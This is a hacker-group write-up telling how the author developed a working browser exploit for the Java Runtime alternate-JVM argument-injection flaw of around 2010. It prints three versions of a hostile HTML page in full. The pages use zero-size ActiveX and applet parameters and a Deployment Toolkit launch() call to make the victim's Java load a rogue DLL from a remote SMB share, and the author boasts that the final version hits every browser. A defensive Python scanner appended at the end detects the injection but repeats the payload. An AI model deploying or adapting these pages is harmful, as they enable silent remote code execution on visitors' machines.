Author : "vinnu"
Team : Legion Of Xtremers (LOXians)
Greets : SecFence team, Lord Deathstorm, Happy Terminator, fb1h2s, b0nd and all my friends
Note: This short paper is intended for wannabes who want a glance at the process by which
an exploit is developed when a new vulnerability is released.
I've chosen this vulnerability for the sake of simplicity: every step is easy to
understand distinctly.
Here I am presenting technical details about the Alternate JVM vulnerability
and its exploit development for all web browsers in the market. This story dates from around
April 2010.
In the afternoon everyone in the team was busy with the vulnerability in the Java Runtime
Environment published on www.reversemode.com by Tavis Ormandy.
So I decided to take a look and immediately downloaded all the JRE versions available
to date from Java's site.
Note: At that time the latest JRE update was 6u19, which was also vulnerable, and
Java was not treating this vulnerability as critical for Windows systems. The criticality
was that every Windows version to date with Java installed was vulnerable to remote code execution.
The ActiveX control 8AD9C840-044E-11D1-B3E9-00805F499D93 and the DeploymentToolkit ActiveX control CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
were vulnerable. The vulnerability was that an attacker could force the JRE to load a DLL with a
specific name from a remote SMB share as an alternate JVM.
Started testing, but everything failed. A DLL was prepared and placed in a shared folder, and a webpage
In the first ActiveX control mentioned above, two parameters, 'launchjnlp' and 'docbase', were vulnerable to
undocumented argument passing. One of those drastic undocumented arguments was -J; combined with the -XXaltjvm
option, it leads to my rogue DLL injection.
The attacking code looked like this:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.dll_file">
<PARAM name="docbase" value="-J-XXaltjvm=\\ipaddress\share_folder_containing_jvm.dll_file">
</object>
</body>
</html>
<!------------------------------>
But the attack failed and did not work as intended. So I opened a console and ran:
java /?
to check its arguments. I tried some other arguments too, and accidentally placed one
option right before "-J-XXaltjvm" and tried again. It threw an error:
Can not find \\ipaddress\share\jvm.dll\jvm.dll\jvm.dll
So by accident I now knew two things:
1. "-J-XXaltjvm" needs some junk prefixed first, like:
"abc -J-XXaltjvm"
2. It automatically searches for jvm.dll in the specified shared folder, so there is no need to specify jvm.dll
Then I modified the above jvmtest.htm as follows.
Suppose you've placed the jvm.dll file in the \\ipaddress\share_folder folder; then:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>
</body>
</html>
<!------------------------------>
all JRE versions. That meant I needed to develop something that would work with most web
browsers in the market.
The above code worked with JRE versions around 6u18 and 6u19.
The second ActiveX control listed above had a method named launch(parameter). The parameter to the launch
function was the place for our argument injection. So I altered jvmtest.htm:
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
<PARAM name="launchjnlp" value="sd -J-XXaltjvm=\\ipaddress\share_folder">
<PARAM name="docbase" value="asd-J-XXaltjvm=\\ipaddress\share_folder">
</object>
<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig != 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>
</body>
</html>
<!------------------------------>
But three or four days later, Kaspersky researchers said that the Google Chrome web browser
was not vulnerable to such attacks.
So it now seemed like a challenge for the whole security community.
I too set out to tackle it, and discovered that JRE versions 6u18 and 6u19
can even be targeted with applet tags, without specifying the first ActiveX
classid listed above.
But initially Chrome seemed to be immune to this trick too.
Soon I realised that Chrome needs
src=""
And Google Chrome too fell into my hands.... ah, Kaspersky researchers, so many days of research,
such huge teams, and so much of the best equipment; how (why) did Chrome escape....???
The following code was developed to kill all browsers in the market supporting Java with the
latest version at that time (JRE 6u19):
<!-----------jvmtest.htm------------------->
<html>
<head></head>
<body>
JVM Testing
<HR>
<applet code="" codebase="" height="0" width="0">
<PARAM name="launchjnlp" value="hitoall -Xnosplash -J-XXaltjvm=\\ipaddress\share">
<PARAM name="docbase" value="sowhatsurplan -Xnosplash -J-XXaltjvm=\\ipaddress\share">
</applet>
<script language=javascript>
var navig = navigator.appName.substring(0,5).toUpperCase();
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
if(navig != 'MICRO') {
obj.type = "application/npruntime-scriptable-plugin;DeploymentToolkit";
}
document.body.appendChild(obj);
obj.launch("http: -J-XXaltjvm=\\ipaddress\share");
</script>
</body>
</html>
<!------------------------------>
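As an added defensive example (my code, not the write-up's), a small Python scanner that flags the argument injection described above in HTML passing through a proxy or stored in a page archive: it looks for -XXaltjvm inside the launchjnlp/docbase PARAMs and inside Deployment Toolkit launch() arguments, allowing for the junk prefix the write-up found necessary, and marks UNC paths as remote. The sample page and its host address 192.0.2.10 are constructed.

```python
import re

# Constructed sample page (not the write-up's own file): the applet vector plus the
# Deployment Toolkit launch() vector; 192.0.2.10 is a placeholder host.
SAMPLE_HTML = r"""<html><body>
<applet code="" codebase="" height="0" width="0">
<PARAM name="launchjnlp" value="hitoall -Xnosplash -J-XXaltjvm=\\192.0.2.10\share">
<PARAM name="docbase" value="sowhatsurplan -Xnosplash -J-XXaltjvm=\\192.0.2.10\share">
</applet>
<script>
var obj = document.createElement("OBJECT");
obj.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
obj.launch("http: -J-XXaltjvm=\\192.0.2.10\share");
</script>
</body></html>"""

# The two ActiveX CLSIDs named in the write-up.
SUSPECT_CLSIDS = ("8AD9C840-044E-11D1-B3E9-00805F499D93",
                  "CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA")

# The option can sit anywhere in the value (the write-up shows junk must be prefixed),
# so it is not anchored; -XXaltjvm without the -J pass-through prefix is matched too.
ALTJVM_RE = re.compile(r"-(?:J-)?XXaltjvm=([^\s\"'>]+)", re.IGNORECASE)
PARAM_RE = re.compile(
    r"<param\s+name\s*=\s*[\"']?(launchjnlp|docbase)[\"']?\s+value\s*=\s*[\"']([^\"']*)[\"']",
    re.IGNORECASE)
LAUNCH_RE = re.compile(r"\.launch\(\s*[\"']([^\"']*)[\"']")

def is_remote_unc(path: str) -> bool:
    # A UNC path (\\host\share) means jvm.dll would be fetched over SMB.
    return path.startswith("\\\\")

def scan_html(html: str) -> list:
    """One finding per injected -XXaltjvm option, whether it arrives through an
    applet/object PARAM (launchjnlp, docbase) or a Deployment Toolkit launch() call."""
    findings = []
    for name, value in PARAM_RE.findall(html):
        for path in ALTJVM_RE.findall(value):
            findings.append({"vector": "param:" + name.lower(), "path": path,
                             "remote": is_remote_unc(path)})
    for arg in LAUNCH_RE.findall(html):
        for path in ALTJVM_RE.findall(arg):
            findings.append({"vector": "launch()", "path": path,
                             "remote": is_remote_unc(path)})
    return findings

def references_suspect_clsid(html: str) -> bool:
    # Weaker signal on its own: the page instantiates one of the affected controls.
    return any(c in html.upper() for c in SUSPECT_CLSIDS)
```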